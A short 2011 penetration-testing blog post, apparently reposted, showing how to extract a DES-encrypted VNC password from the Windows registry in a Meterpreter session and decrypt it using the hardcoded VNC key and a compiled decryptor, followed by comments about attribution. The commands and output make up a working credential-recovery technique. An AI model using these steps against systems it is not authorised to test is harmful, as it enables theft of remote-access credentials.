Mar 16, 2011

VNC passwords and Metasploit and DES

inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.

Source: http://carnal0wnage.attackresearch.com/node/446

3 comments:

CG said...
This comment has been removed by the author.
Medt said...

In the last of all my post, I will post where I get it from which "Source:" and this post I said the source is "Source: http://carnal0wnage.attackresearch.com/node/446 ".

Did you see it?

Medt said...

For CG, I'm so sorry that is my mistake to delete your comment. I really don't want to do like that. -*- Sorry again. And I want to tell you every posts in this blog I always link it to the source with "Source:", I'm so sorry if you think I'm unclear about the source of this article.

 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |